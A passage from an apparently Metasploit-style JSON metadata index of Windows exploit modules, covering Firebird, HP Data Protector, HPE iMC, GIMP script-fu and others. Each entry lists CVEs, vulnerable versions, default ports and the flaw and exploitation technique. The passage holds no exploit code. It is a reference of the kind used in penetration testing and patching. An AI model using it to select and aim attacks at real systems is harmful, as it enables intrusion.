vulnerability\n in Disk Savvy Enterprise v10.4.18, caused by improper bounds\n checking of the request sent to the built-in server. 
This module\n has been tested successfully on Windows 7 SP1 x86.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 9124, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Disk Savvy Enterprise v10.4.18" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/disk_savvy_adm.rb", + "is_install_path": true, + "ref_name": "windows/misc/disk_savvy_adm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/doubletake": { + "name": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow", + "fullname": "exploit/windows/misc/doubletake", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-06-04", + "type": "exploit", + "author": [ + "ri0t " + ], + "description": "This module exploits a stack buffer overflow in the authentication mechanism of\n NSI Doubletake which is also rebranded as HP Storage Works. 
This vulnerability\n was found by Titon of Bastard Labs.", + "references": [ + "CVE-2008-1661", + "OSVDB-45924" + ], + "platform": "Windows", + "arch": "", + "rport": 1100, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "doubletake 4.5.0", + "doubletake 4.4.2", + "doubletake 4.5.0.1819" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/doubletake.rb", + "is_install_path": true, + "ref_name": "windows/misc/doubletake", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/eiqnetworks_esa": { + "name": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", + "fullname": "exploit/windows/misc/eiqnetworks_esa", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-24", + "type": "exploit", + "author": [ + "MC ", + "ri0t ", + "kf " + ], + "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the LICMGR_ADDLICENSE command, a stack-based\n buffer overflow occurs. 
This module has only been tested\n against ESA v2.1.13.", + "references": [ + "CVE-2006-3838", + "OSVDB-27526", + "BID-19163", + "ZDI-06-024" + ], + "platform": "Windows", + "arch": "", + "rport": 10616, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "EnterpriseSecurityAnalyzerv21 Universal", + "EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English", + "EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2", + "EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1", + "Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2", + "Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2", + "Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", + "iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2", + "SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2", + "Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1", + "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English", + "Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2", + "Top Layer Network Security 
Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/eiqnetworks_esa.rb", + "is_install_path": true, + "ref_name": "windows/misc/eiqnetworks_esa", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/eiqnetworks_esa_topology": { + "name": "eIQNetworks ESA Topology DELETEDEVICE Overflow", + "fullname": "exploit/windows/misc/eiqnetworks_esa_topology", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-25", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the DELETEDEVICE command in the Topology\n server, a stack-based buffer overflow occurs.\n\n This module has only been tested against ESA v2.1.13.", + "references": [ + "CVE-2006-3838", + "OSVDB-27528", + "BID-19164" + ], + "platform": "Windows", + "arch": "", + "rport": 10628, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb", + "is_install_path": true, + "ref_name": "windows/misc/eiqnetworks_esa_topology", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/enterasys_netsight_syslog_bof": { + "name": "Enterasys NetSight nssyslogd.exe Buffer Overflow", + "fullname": "exploit/windows/misc/enterasys_netsight_syslog_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-19", + "type": "exploit", + "author": [ + "Jeremy Brown", + "rgod ", + "juan vazquez " + ], + "description": "This 
module exploits a stack buffer overflow in Enterasys NetSight. The\n vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially\n crafted PRIO from a syslog message. The module has been tested successfully on\n Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.", + "references": [ + "CVE-2011-5227", + "OSVDB-77971", + "BID-51124", + "ZDI-11-350" + ], + "platform": "Windows", + "arch": "", + "rport": 514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Enterasys NetSight 4.0.1.34 / Windows XP SP3", + "Enterasys NetSight 4.0.1.34 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/enterasys_netsight_syslog_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/eureka_mail_err": { + "name": "Eureka Email 2.2q ERR Remote Buffer Overflow", + "fullname": "exploit/windows/misc/eureka_mail_err", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-22", + "type": "exploit", + "author": [ + "Francis Provencher (Protek Research Labs)", + "Dr_IDE", + "dookie", + "jduck " + ], + "description": "This module exploits a buffer overflow in the Eureka Email 2.2q\n client that is triggered through an excessively long ERR message.\n\n NOTE: this exploit isn't very reliable. 
Unfortunately reaching the\n vulnerable code can only be done when manually checking mail (Ctrl-M).\n Checking at startup will not reach the code targeted here.", + "references": [ + "CVE-2009-3837", + "OSVDB-59262", + "EDB-10235" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win XP SP3 English", + "Win XP SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/eureka_mail_err.rb", + "is_install_path": true, + "ref_name": "windows/misc/eureka_mail_err", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/fb_cnct_group": { + "name": "Firebird Relational Database CNCT Group Number Buffer Overflow", + "fullname": "exploit/windows/misc/fb_cnct_group", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-31", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in Firebird SQL Server. A specially\n crafted packet can be sent which will overwrite a pointer allowing the attacker to\n control where data is read from. Shortly, following the controlled read, the\n pointer is called resulting in code execution.\n\n The vulnerability exists with a group number extracted from the CNCT information,\n which is sent by the client, and whose size is not properly checked.\n\n This module uses an existing call to memcpy, just prior to the vulnerable code,\n which allows a small amount of data to be written to the stack. 
A two-phases\n stack pivot allows to execute the ROP chain which ultimately is used to execute\n VirtualAlloc and bypass DEP.", + "references": [ + "CVE-2013-2492", + "OSVDB-91044" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows FB 2.5.2.26539", + "Windows FB 2.5.1.26351", + "Windows FB 2.1.5.18496", + "Windows FB 2.1.4.18393", + "Debug" + ], + "mod_time": "2018-10-27 20:54:14 +0000", + "path": "/modules/exploits/windows/misc/fb_cnct_group.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_cnct_group", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/fb_isc_attach_database": { + "name": "Firebird Relational Database isc_attach_database() Buffer Overflow", + "fullname": "exploit/windows/misc/fb_isc_attach_database", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38607", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/fb_isc_attach_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_isc_attach_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/misc/fb_isc_create_database": { + "name": "Firebird Relational Database isc_create_database() Buffer Overflow", + "fullname": "exploit/windows/misc/fb_isc_create_database", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38606", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/fb_isc_create_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_isc_create_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/fb_svc_attach": { + "name": "Firebird Relational Database SVC_attach() Buffer Overflow", + "fullname": "exploit/windows/misc/fb_svc_attach", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38605", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Firebird WI-V1.5.3.4870 WI-V1.5.4.4910", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 
+0000", + "path": "/modules/exploits/windows/misc/fb_svc_attach.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_svc_attach", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/gh0st": { + "name": "Gh0st Client buffer Overflow", + "fullname": "exploit/windows/misc/gh0st", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-07-27", + "type": "exploit", + "author": [ + "Professor Plum" + ], + "description": "This module exploits a Memory buffer overflow in the Gh0st client (C2 server)", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Gh0st Beta 3.6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/gh0st.rb", + "is_install_path": true, + "ref_name": "windows/misc/gh0st", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/gimp_script_fu": { + "name": "GIMP script-fu Server Buffer Overflow", + "fullname": "exploit/windows/misc/gimp_script_fu", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-18", + "type": "exploit", + "author": [ + "Joseph Sheridan", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in the script-fu server\n component on GIMP <= 2.6.12. 
By sending a specially crafted packet, an\n attacker may be able to achieve remote code execution under the context\n of the user.\n\n This module has been tested on GIMP for Windows from installers\n provided by Jernej Simoncic.", + "references": [ + "CVE-2012-2763", + "OSVDB-82429", + "BID-53741", + "EDB-18956", + "URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html" + ], + "platform": "Windows", + "arch": "", + "rport": 10008, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1", + "GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/gimp_script_fu.rb", + "is_install_path": true, + "ref_name": "windows/misc/gimp_script_fu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_cmd_exec": { + "name": "HP Data Protector 8.10 Remote Command Execution", + "fullname": "exploit/windows/misc/hp_dataprotector_cmd_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-11-02", + "type": "exploit", + "author": [ + "Christian Ramirez", + "Henoch Barrera", + "Matthew Hall " + ], + "description": "This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary\n commands can be executed by sending crafted requests with opcode 28 to the OmniInet\n service listening on the TCP/5555 port. Since there is a strict length limitation on\n the command, rundll32.exe is executed, and the payload is provided through a DLL by a\n fake SMB server. 
This module has been tested successfully on HP Data Protector 8.1 on\n Windows 7 SP1.", + "references": [ + "CVE-2014-2623", + "OSVDB-109069", + "EDB-34066", + "URL-https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 8.10 / Windows" + ], + "mod_time": "2022-02-15 18:03:13 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_cmd_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_crs": { + "name": "HP Data Protector Cell Request Service Buffer Overflow", + "fullname": "exploit/windows/misc/hp_dataprotector_crs", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-03", + "type": "exploit", + "author": [ + "e6af8de8b1d4b2b6d5ba2610cbf9cd38", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. 
This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.", + "references": [ + "CVE-2013-2333", + "OSVDB-93867", + "BID-60309", + "ZDI-13-130" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "HP Data Protector 6.20 build 370 / Windows XP SP3", + "HP Data Protector 7.00 build 72 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_crs.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_crs", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_dtbclslogin": { + "name": "HP Data Protector DtbClsLogin Buffer Overflow", + "fullname": "exploit/windows/misc/hp_dataprotector_dtbclslogin", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-09", + "type": "exploit", + "author": [ + "AbdulAziz Hariri", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The\n overflow occurs during the login process, in the DtbClsLogin function provided by\n the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an\n insecure way with the username. 
A successful exploitation will lead to code execution\n with the privileges of the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server\n Service) process, which runs as SYSTEM by default.", + "references": [ + "CVE-2010-3007", + "OSVDB-67973", + "BID-43105", + "ZDI-10-174", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535" + ], + "platform": "Windows", + "arch": "", + "rport": 3817, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_dtbclslogin", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_encrypted_comms": { + "name": "HP Data Protector Encrypted Communication Remote Command Execution", + "fullname": "exploit/windows/misc/hp_dataprotector_encrypted_comms", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-04-18", + "type": "exploit", + "author": [ + "Jon Barg", + "Ian Lovering" + ], + "description": "This module exploits a well known remote code execution exploit after establishing encrypted\n control communications with a Data Protector agent. This allows exploitation of Data\n Protector agents that have been configured to only use encrypted control communications.\n\n This exploit works by executing the payload with Microsoft PowerShell so will only work\n against Windows Vista or newer. 
Tested against Data Protector 9.0 installed on Windows\n Server 2008 R2.", + "references": [ + "CVE-2016-2004", + "URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_encrypted_comms", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_exec_bar": { + "name": "HP Data Protector Backup Client Service Remote Code Execution", + "fullname": "exploit/windows/misc/hp_dataprotector_exec_bar", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-01-02", + "type": "exploit", + "author": [ + "Aniway.Anyway ", + "juan vazquez " + ], + "description": "This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code\n execution. The vulnerability exists in the EXEC_BAR operation, which allows to\n execute arbitrary processes. 
This module has been tested successfully on HP Data\n Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.", + "references": [ + "CVE-2013-2347", + "BID-64647", + "ZDI-14-008", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422", + "URL-http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 6.20 build 370 / VBScript CMDStager", + "HP Data Protector 6.20 build 370 / Powershell" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_exec_bar", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_install_service": { + "name": "HP Data Protector 6.10/6.11/6.20 Install Service", + "fullname": "exploit/windows/misc/hp_dataprotector_install_service", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-11-02", + "type": "exploit", + "author": [ + "Ben Turner" + ], + "description": "This module exploits HP Data Protector OmniInet process on Windows only.\n This exploit invokes the install service function which allows an attacker to create a\n custom payload in the format of an executable.\n\n To ensure this works, the SMB server created in MSF must have a share called Omniback\n which has a subfolder i386, i.e. 
\\\\192.168.1.1\\Omniback\\i386\\", + "references": [ + "CVE-2011-0922", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 6.10/6.11/6.20 / Windows" + ], + "mod_time": "2022-05-11 12:40:43 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_install_service.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_install_service", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_new_folder": { + "name": "HP Data Protector Create New Folder Buffer Overflow", + "fullname": "exploit/windows/misc/hp_dataprotector_new_folder", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-12", + "type": "exploit", + "author": [ + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in HP Data Protector 5. The overflow\n occurs in the creation of new folders, where the name of the folder is handled in a\n insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the\n folder name is split in fragments in this insecure copy. Because of this, this module\n uses egg hunting to search a non corrupted copy of the payload in the heap. On the other\n hand the overflowed buffer is stored in a frame protected by stack cookies, because of\n this SEH handler overwrite is used.\n\n Any user of HP Data Protector Express is able to create new folders and trigger the\n vulnerability. Moreover, in the default installation the 'Admin' user has an empty\n password. 
Successful exploitation will lead to code execution with the privileges of\n the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server Service) process, which\n runs as SYSTEM by default.", + "references": [ + "CVE-2012-0124", + "OSVDB-80105", + "BID-52431", + "URL-https://www.rapid7.com/blog/post/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124" + ], + "platform": "Windows", + "arch": "", + "rport": 3817, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector Express 6.0.00.11974 / Windows XP SP3", + "HP Data Protector Express 5.0.00.59287 / Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_new_folder", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_traversal": { + "name": "HP Data Protector Backup Client Service Directory Traversal", + "fullname": "exploit/windows/misc/hp_dataprotector_traversal", + "aliases": [], + "rank": 500, + "disclosure_date": "2014-01-02", + "type": "exploit", + "author": [ + "Brian Gorenc", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability in the Hewlett-Packard Data\n Protector product. The vulnerability exists in the Backup Client Service (OmniInet.exe)\n and is triggered when parsing packets with opcode 42. 
This module has been tested\n successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.", + "references": [ + "CVE-2013-6194", + "OSVDB-101630", + "BID-64647", + "ZDI-14-003", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 6.20 build 370 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_traversal.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_traversal", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/hp_imc_dbman_restartdb_unauth_rce": { + "name": "HPE iMC dbman RestartDB Unauthenticated RCE", + "fullname": "exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "sztivi", + "Chris Lyne", + "bcoles " + ], + "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restart\n a user-specified database instance (OpCode 10008), however the\n instance ID is not sanitized, allowing execution of arbitrary\n operating system commands as SYSTEM. 
This service listens on\n TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", + "references": [ + "CVE-2017-5816", + "EDB-43198", + "ZDI-17-340", + "BID-98469", + "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" + ], + "platform": "Windows", + "arch": "", + "rport": 2810, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_imc_dbman_restartdb_unauth_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_imc_dbman_restartdb_unauth_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_imc_dbman_restoredbase_unauth_rce": { + "name": "HPE iMC dbman RestoreDBase Unauthenticated RCE", + "fullname": "exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "sztivi", + "Chris Lyne", + "bcoles " + ], + "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restore\n a user-specified database (OpCode 10007), however the database\n connection username is not sanitized resulting in command injection,\n allowing execution of arbitrary operating system commands as SYSTEM.\n This service listens on TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", + "references": [ + "CVE-2017-5817", + "EDB-43195", + "ZDI-17-341", + "BID-98469", + "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" + ], + "platform": "Windows", + "arch": "", + 
"rport": 2810, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_imc_dbman_restoredbase_unauth_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_imc_uam": { + "name": "HP Intelligent Management Center UAM Buffer Overflow", + "fullname": "exploit/windows/misc/hp_imc_uam", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-08-29", + "type": "exploit", + "author": [ + "e6af8de8b1d4b2b6d5ba2610cbf9cd38", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in HP Intelligent Management Center\n UAM. The vulnerability exists in the uam.exe component, when using sprint in a\n insecure way for logging purposes. The vulnerability can be triggered by sending a\n malformed packet to the 1811/UDP port. 
The module has been successfully tested on\n HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2012-3274", + "OSVDB-85060", + "BID-55271", + "ZDI-12-171", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863" + ], + "platform": "Windows", + "arch": "", + "rport": 1811, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_imc_uam.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_imc_uam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_loadrunner_magentproc": { + "name": "HP LoadRunner magentproc.exe Overflow", + "fullname": "exploit/windows/misc/hp_loadrunner_magentproc", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-27", 